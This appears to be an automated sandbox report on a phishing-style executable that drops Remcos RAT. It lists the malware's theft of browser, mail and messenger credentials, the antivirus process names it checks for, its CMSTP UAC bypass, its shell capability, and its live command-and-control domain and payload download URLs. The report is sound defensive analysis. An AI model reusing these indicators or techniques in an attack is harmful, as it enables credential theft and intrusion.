Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040A9150 GetLocalTime,

0_2_040A9150

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B60D GetComputerNameExW,GetUserNameW,

24_2_1234B60D

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_00401108 GetTimeZoneInformation,

24_2_00401108

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040AB6D0 GetVersionExA,

0_2_040AB6D0

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

24_2_1233BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: \key3.db		24_2_1233BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: ESMTPPassword	28_2_004033F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	28_2_00402DB3
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	28_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 8172, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: cmd.exe

24_2_1233569A

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.3.109.132	www.zuckdgreb.duckdns.org	United States	36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false

Contacted Domains

Name	IP	Active
dual-spov-0006.spov-msedge.net	13.107.139.11	true
www.zuckdgreb.duckdns.org	192.3.109.132	true
geoplugin.net	178.237.33.50	true
onedrive.live.com	unknown	unknown
abpoxw.sn.files.1drv.com	unknown	unknown
aborlw.sn.files.1drv.com	unknown	unknown
abqscw.sn.files.1drv.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk	false		high
https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4	false		high
xwww.zuckdgreb.duckdns.org	true	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	true	URL Reputation: phishing	unknown
https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Found malware configuration

Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	ReversingLabs: Detection: 26%
Source: C:\Windows \System32\netutils.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: midyear_statement.exe	ReversingLabs: Detection: 26%
Source: midyear_statement.exe	Virustotal: Detection: 31%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12363837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		24_2_12363837
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		27_2_00404423

Source: wkrriuhD.pif

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_123374FD _wcslen,CoGetObject,

24_2_123374FD

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack

Uses 32bit PE files

Source: midyear_statement.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source:	Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339665
